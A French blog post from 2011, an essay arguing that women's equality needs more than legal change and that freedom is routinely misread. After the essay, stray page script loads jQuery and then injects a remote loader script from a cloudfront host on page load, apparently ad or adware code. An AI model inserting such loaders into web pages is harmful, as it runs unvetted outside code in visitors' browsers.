Overblog
Editer l'article Suivre ce blog Administration + Créer mon blog
13 août 2011 6 13 /08 /août /2011 12:10

2551, 2008 ou 1427, toutes les dates s’indignent: pas encore l’égale? Aujourd’hui encore, nous demeurons dans l’attente active. Ceci dit, probablement n’est-ce qu’une perception latente d’une égarée civilisationnelle.

On semble prétendre dissoudre la charge historique et la force de l’héritage de quelques avant-gardistes, fous et prétentieux, à vouloir corriger cette iniquité de l’histoire.

Nulle est ma volonté de situer le débat sur un registre comparatif, mais si je ne remonte qu’au dernier des prophètes, véritable initiateur de cette légalité, je m’effraye à constater une mémoire collective défaillante, une sévère incapacité à contextualiser les textes et pour finir, une naïve transposition des schèmes dits civilisés.

Ne nous voilons pas la face derrière des slogans trop ressassés. La farce de la femme -objet, de l’endurante, de la douce compagne ou encore de la doyenne du «sweet home» aurait dû être obsolètes depuis belle lurette. Tant qu’on fêtera la femme comme on fête l’enfant ou l’habit traditionnel, on s’ancrera encore, sans probablement le savoir, dans cette instrumentalisation qui ne fait avancer ni le droit, ni les mentalités.

Y-aurait-il une inertie sociale ? une volonté occulte ? un enjeu de pouvoir politique ? une peur d’un ébranlement culturel ? J’ai la vague impression qu’il y a un épisode manquant dans cette évolution vers l’égalité.

Certains ne posent la question qu’en terme légal. Mais le droit est l’instrument le plus rapide à changer. L’égalité devrait s’exprimer effectivement dans les postures socio-économiques. Certains dénoncent cette égalité sous sa compréhension légère du style : «on n’a pas les mêmes rôles sociaux, donc on ne peut pas être égaux» ou encore plus abruptement « lui est protection et elle procréation, la nature ne nous a pas faites égaux»… Chimères, l’égalité ne se déploie-t-elle pas avant tout dans une forme moderne de la liberté. Malheureusement, cette  dernière peut voir sa compréhension escamotée. A moins de confondre liberté et libertinage.

Quand je clame liberté de gagner toute seule son argent, on comprend la liberté de le dépenser sur tout le monde. Quand j’avance la liberté de performer professionnellement, on comprend la liberté d’être sous payée. Quand je dis la liberté de choisir son homme, on comprend la liberté de rester célibataire. Quand j’exprime la liberté d’avoir à deux des enfants, on comprend la liberté de les élever seule.

La liberté n’est peut être pas dans le partage.. la liberté est partage !

 

if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};
Partager cet article
Repost0

commentaires